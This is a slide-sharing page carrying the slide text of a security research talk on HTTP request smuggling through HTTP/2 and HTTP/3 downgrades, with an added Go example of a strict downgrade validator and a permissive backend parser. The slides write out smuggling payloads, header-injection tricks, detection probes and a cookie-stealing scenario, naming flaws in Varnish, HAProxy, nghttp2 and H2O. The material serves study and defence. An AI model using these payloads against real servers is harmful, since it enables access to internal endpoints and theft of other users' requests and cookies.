Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdf
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdf
 

HTTP Request Smuggling via higher HTTP versions

  • 1. Emil Lerner HTTP Request Smuggling via higher HTTP versions
  • 2. Emil Lerner independentsecurityresearcher CTO at WunderFund.io Bushwhackers CTF team @emil_lerner @neex
  • 4. Reverse proxy HTTP Response HTTP Request Client HTTP Response HTTP Request Frontend Server Backend Server
  • 5. HTTP keep-alive HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 Client Server
  • 6. HTTP/1.1 body transfer Content-Length header Content-Length: 100 Here goes 100 bytes of the request body. Transfer-Encoding: chunked ff 10 0 Here goes 255-byte chunk Another chunk Chunked encoding
  • 7. HTTP keep-alive (to backend) HTTP Response 1 HTTP Request 1 HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 HTTP Response 2 HTTP Request 2 Single backend connection Client2 connection Client1 connection Client1 Client2 Frontend Server Backend Server
  • 8. HTTP Request Smuggling Old & known attack Gained a lot of attention after James Kettle's talk on BH USA 2019 He discovered a lot of new techniques
  • 9. HTTP Request Smuggling An attacker sends a malicious request It is parsed as a single request by the frontend and is forwarded to the backend Backend parses it as two separate requests
  • 10. POST / HTTP/1.1 Content-Length: 100 0 Transfer-Encoding : chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request HTTP Request Smuggling
  • 11. HTTP Request Smuggling It's all about Content-Length / Transfer-Encoding Transfer-Encoding has precedence We need to "smuggle" Transfer-Encoding to backend unprocessed by the frontend
  • 12. HTTP Request Smuggling POST / HTTP/1.1 Content-Length: 100 Transfer-Encoding: identity, 0 chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request
  • 13. Exploitation Accessing internal endpoints Cache poisoning Stealing other users’ requests
  • 14. Exploitation: stealing requests Attacker→Frontend Victim→Frontend GET / HTTP/1.1 ... POST /save HTTP/1.1 Transfer-Encoding : chunked GET / HTTP/1.1 Cookie: secret GET / HTTP/1.1 Transfer-Encoding : chunked ... POST /save HTTP/1.1 data=GET / HTTP/1.1 Cookie: secret Frontend→Backend
  • 15. Exploitation: stealing requests The victim's request is appended to ours Most frameworks are OK with newlines in forms Victim's cookies are saved to our profile, PMs or other places where we can view them later
  • 16. HTTP/2 overview Widely adopted by now Binary protocol (no special chars) Almost always terminated at frontend
  • 17. HTTP/2 termination :status 200 PRI * HTTP/2.0 <binary> :method GET HTTP/1.1 200 OK GET / HTTP/1.1 Frontend Backend Client
  • 18. HTTP/2 body transfer Request body is transferred in binary frames Content-Length not required, but allowed Transfer-Encoding: chunked has no effect
  • 19. Potential bug #1: content-length conflicts actual length Client→Frontend :method POST :authority host.com XGET /internal HTTP/1.1 ... content-length: 1 POST / HTTP/1.1 Host: host.com Content-Length: 1 XGET /internal HTTP/1.1 ... Frontend→Backend body
• 20. Potential bug #2: no content-length forwarding
  Client→Frontend (HTTP/2):
    :method GET
    :authority host.com
    DATA: GET /internal HTTP/1.1 ...
  Frontend→Backend (HTTP/1.1):
    GET / HTTP/1.1
    Host: host.com

    GET /internal HTTP/1.1
    ...
  The frontend forwards the DATA frames as body but adds no Content-Length, so the backend treats the GET as having no body and parses the forwarded bytes as a second request.
• 21. Potential bug #3: content-length conflicting with transfer-encoding
  Client→Frontend (HTTP/2):
    :method POST
    :authority host.com
    content-length: 100
    transfer-encoding: chunked
    DATA:
      0

      GET /internal HTTP/1.1
      ...
  Frontend→Backend (HTTP/1.1):
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 100
    Transfer-Encoding: chunked

    0

    GET /internal HTTP/1.1
    ...
  The frontend forwards both headers untouched. On the backend Transfer-Encoding wins, the chunked body ends at the "0" chunk and "GET /internal HTTP/1.1 ..." becomes another request.
• 22. HTTP/2 header validation: header names and values are binary strings. Nothing in the framing stops names and values from containing newlines, or names from containing colons; it is up to the implementation to reject them.
• 23. Potential bug #4: newlines in headers
  Client→Frontend (HTTP/2):
    :method GET
    :authority host.com
    x: ...⏎⏎GET /internal HTTP/1.1
  Frontend→Backend (HTTP/1.1):
    GET / HTTP/1.1
    Host: host.com
    X: ...

    GET /internal HTTP/1.1
    ...
  The newlines inside the header value are written verbatim into the HTTP/1.1 stream, terminating the header block and starting a second request.
• 24. Potential bug(s) #5: less strict validation (trailing space in the header name)
  Client→Frontend (HTTP/2):
    :method POST
    :authority host.com
    content-length: 100
    transfer-encoding : chunked
    DATA:
      0

      GET /internal HTTP/1.1
      ...
  Frontend→Backend (HTTP/1.1):
    POST / HTTP/1.1
    Host: host.com
    Content-Length: 100
    transfer-encoding : chunked

    0

    GET /internal HTTP/1.1
    ...
  The frontend does not recognise "transfer-encoding " (with the space) as Transfer-Encoding and forwards it as an unknown header; a backend that trims the name before matching it treats the body as chunked.
• 25. Potential bug(s) #5: less strict validation (underscore instead of dash). The same request with "transfer_encoding: chunked" is forwarded as "Transfer_Encoding: chunked"; a backend that maps underscores to dashes treats the body as chunked.
• 26. Potential bug(s) #5: less strict validation (mixed case in the value). The same request with "transfer-encoding: chunKed" is forwarded as "Transfer-Encoding: chunKed"; the frontend does not match "chunKed" against "chunked", but a backend that compares case-insensitively does.
• 27. What does the RFC say? RFC 7540 covers "Intermediary Encapsulation Attacks" in section 10.3. It basically says that an implementation must reject anything it cannot handle :) and explicitly mentions newlines and \x00 (NUL) as characters to reject.
• 28. Detection idea #1: make the backend expect more data. Craft a request such that the backend expects more data while the frontend thinks it has sent the whole request; the request will hang until a timeout. Implemented in James Kettle's Burp plugin (for HTTP/1.1).
• 29. Detection idea #1: make the backend expect more data
    :method POST
    content-length: 5
    h: ⏎transfer-encoding:chunked
    DATA: fff
  The frontend interprets content-length: 5 and considers the body finished. The backend, seeing the injected transfer-encoding: chunked, reads "fff" as a chunk size (4095 bytes), expects more data and hangs.
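An added example, not part of the talk or of http2smugl, that puts the mechanism of slides 10 to 15, the downgrade bugs #1 to #5 of slides 19 to 26 and detection idea #1 above into runnable Go. DowngradeStrict is a hardened HTTP/2-to-HTTP/1.1 translation with the checks a frontend needs to avoid those bugs (control characters in values, non-token or non-lowercase names, connection-specific headers, content-length not matching the DATA actually received, whitespace in :method or :path). BackendRequests is a deliberately permissive model of an HTTP/1.1 backend: it trims header names, matches "chunked" case-insensitively, lets Transfer-Encoding win over Content-Length, and reports whether it stopped in the middle of a request, which is exactly the hang detection idea #1 looks for. The Header type, both function names and the permissive parsing rules are my assumptions for illustration, not any particular server's behaviour; the byte streams to feed it are the Frontend→Backend bytes shown on the slides.

```go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"io"
	"strconv"
	"strings"
)

// Header is one decoded HTTP/2 field; after HPACK a name or value is an arbitrary byte string.
type Header struct{ Name, Value string }

// isLowerToken: non-empty RFC 7230 token in the lowercase form HTTP/2 requires for names.
func isLowerToken(s string) bool {
	ok := s != ""
	for _, c := range []byte(s) {
		ok = ok && (c >= 'a' && c <= 'z' || c >= '0' && c <= '9' || strings.IndexByte("!#$%&'*+-.^_`|~", c) >= 0)
	}
	return ok
}

// DowngradeStrict translates an HTTP/2 request to HTTP/1.1, rejecting every field the
// HTTP/1.1 side could read differently (bugs #1-#5) and deriving Content-Length from the bytes it forwards.
func DowngradeStrict(hs []Header, body []byte) ([]byte, error) {
	m, p, a, fwd := "", "", "", new(bytes.Buffer)
	pseudo := map[string]*string{":method": &m, ":path": &p, ":authority": &a}
	for _, h := range hs {
		switch norm := strings.ReplaceAll(h.Name, "_", "-"); { // some backends fold '_' into '-'
		case strings.ContainsAny(h.Value, "\r\n\x00"):
			return nil, fmt.Errorf("control character in value of %q", h.Name)
		case pseudo[h.Name] != nil:
			*pseudo[h.Name] = h.Value
		case strings.HasPrefix(h.Name, ":"): // :scheme has no HTTP/1.1 counterpart
		case !isLowerToken(h.Name):
			return nil, fmt.Errorf("invalid header name %q", h.Name)
		case norm == "transfer-encoding", norm == "connection", norm == "upgrade", norm == "host":
			return nil, fmt.Errorf("connection-specific header %q not allowed in HTTP/2", h.Name)
		case norm == "content-length":
			if n, err := strconv.Atoi(h.Value); err != nil || n != len(body) {
				return nil, fmt.Errorf("content-length %q does not match %d body bytes", h.Value, len(body))
			}
		default:
			fmt.Fprintf(fwd, "%s: %s\r\n", h.Name, h.Value)
		}
	}
	if m == "" || p == "" || strings.ContainsAny(m+p+a, " \t\r\n\x00") {
		return nil, fmt.Errorf("malformed request line %q %q %q", m, p, a)
	}
	return []byte(fmt.Sprintf("%s %s HTTP/1.1\r\nHost: %s\r\n%sContent-Length: %d\r\n\r\n%s", m, p, a, fwd.String(), len(body), body)), nil
}

// BackendRequests parses an HTTP/1.1 stream like a permissive backend: header names are
// trimmed and lower-cased, and a Transfer-Encoding containing "chunked" (any case) wins over
// Content-Length. It returns the request lines found and whether it stopped mid-request,
// i.e. whether a real backend would now hang waiting for bytes (the signal of detection idea #1).
func BackendRequests(stream []byte) (reqs []string, waiting bool) {
	r := bufio.NewReader(bytes.NewReader(stream))
	line := func() (string, bool) {
		l, err := r.ReadString('\n')
		return strings.TrimRight(l, "\r\n"), err == nil
	}
	skip := func(n int64) bool { _, err := io.CopyN(io.Discard, r, n); return n >= 0 && err == nil }
	for {
		l, ok := line()
		if !ok {
			return reqs, l != "" // EOF between requests is clean; inside a request line it is not
		}
		reqs = append(reqs, l)
		length, chunked := int64(0), false
		for h, ok := line(); h != "" || !ok; h, ok = line() {
			if !ok {
				return reqs, true
			}
			name, val, _ := strings.Cut(h, ":")
			if name = strings.ToLower(strings.TrimSpace(name)); name == "content-length" {
				length, _ = strconv.ParseInt(strings.TrimSpace(val), 10, 64)
			} else if name == "transfer-encoding" {
				chunked = strings.Contains(strings.ToLower(val), "chunked")
			}
		}
		if !chunked && !skip(length) {
			return reqs, true
		}
		for chunked { // chunk = hex size line, data, CRLF; size 0 ends the body
			sz, ok := line()
			n, err := strconv.ParseInt(strings.TrimSpace(sz), 16, 64)
			if !ok || err != nil || !skip(n) {
				return reqs, true
			}
			if _, ok = line(); !ok { // CRLF after the data, or the line closing the trailer section
				return reqs, true
			}
			chunked = n != 0
		}
	}
}
```

Feeding the Frontend→Backend bytes of slides 19, 21 or 24 to BackendRequests yields two request lines, the second being "GET /internal HTTP/1.1"; the request-stealing stream of slide 14 yields "GET / HTTP/1.1" and "POST /save HTTP/1.1" with the victim's cookie request swallowed into the body; the naively forwarded request of slide 29 yields one request line and waiting == true. Giving the same HTTP/2 headers to DowngradeStrict returns an error in every one of those cases, while a clean request comes back with a Content-Length computed from the forwarded DATA, so the backend can never disagree with the frontend about where the body ends.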
• 30. Detection idea #2: chunked body parsing. Chunked encoding should never be parsed in HTTP/2, so if the response depends on whether the chunked body is valid, that is a possible vulnerability. There are some false positives.
• 31. Detection idea #2: chunked body parsing
  Client→Frontend (HTTP/2):
    :method POST
    transfer-encoding : chunked
    DATA: invalid chunked body
  Frontend→Backend (HTTP/1.1):
    POST / HTTP/1.1
    transfer-encoding : chunked

    invalid chunked body
  Backend→Frontend: HTTP/1.1 400; Frontend→Client: :status 400. The 400 shows that something parsed the body as chunked.
• 32. Detection idea #3: content-length parsing. Send something like "x:x⏎content-length:1000". If the response depends on the value, it's a possible vulnerability. Even more false positives :(
• 33. False positive scenario: the frontend terminates HTTP/2, converts the request to HTTP/1 and processes it as HTTP/1 itself before speaking HTTP/1.1 to the backend. The response can then depend on HTTP/1 parsing without the backend being involved at all.
• 34. Varnish flaw
  Client→Varnish (HTTP/2):
    :method GET
    :authority host.com
    content-length: 0
    DATA: GET /internal HTTP/1.1 ...
  Varnish→Backend (HTTP/1.1):
    GET / HTTP/1.1
    Host: host.com
    content-length: 0

    GET /internal HTTP/1.1
    ...
  Varnish forwards the DATA frames even though content-length is 0, so the backend parses them as a second request.
• 35. Potential bug #6: RFC 8441, designed for WebSockets over HTTP/2. A client sends the CONNECT method and sets the :protocol pseudo-header; the intermediary translates it into an HTTP/1.1 Upgrade.
• 36. Haproxy & nghttp2 flaws
  Client→Frontend (HTTP/2):
    :method CONNECT
    :protocol websocket
    :authority host.com
    DATA: GET /internal HTTP/1.1 ...
  Frontend→Backend (HTTP/1.1):
    GET / HTTP/1.1
    Host: host.com
    Connection: upgrade
    Upgrade: websocket

    GET /internal HTTP/1.1
    ...
  The DATA frames are forwarded right after the Upgrade request; a backend that does not switch protocols parses them as the next request.
• 37. Open problem: one-way size discrepancy. The attacks work if the backend reads less data than the frontend sent; the detection methods work if the backend expects more data than the frontend sent. What if the first is achievable but the second is not?
• 38. H2O HTTP/3 (QUIC) flaw
  Client→Frontend (HTTP/3):
    :method POST
    content-length: 100
    x: x⏎transfer-encoding:chunked
    DATA:
      0

      GET /internal HTTP/1.1
      ...
  Frontend→Backend (HTTP/1.1):
    POST / HTTP/1.1
    Content-length: 100
    X: x
    Transfer-Encoding: chunked

    0

    GET /internal HTTP/1.1
    ...
  The newline injected through the HTTP/3 header lands in the HTTP/1.1 stream as a real Transfer-Encoding header (bug #4 again, this time over QUIC).
• 39. Automation: I've implemented the http2smugl tool. It performs automatic vulnerability detection using the methods discussed, and it supports sending "invalid" requests via a custom HTTP/2 implementation.
• 40. Further research needed: HTTP/1 special headers, writing to closed streams, HPACK and more than 40 implementations have not been researched yet; stable detection methods are wanted; putting a space plus a path into :method can lead to hitting internal endpoints and to Host override.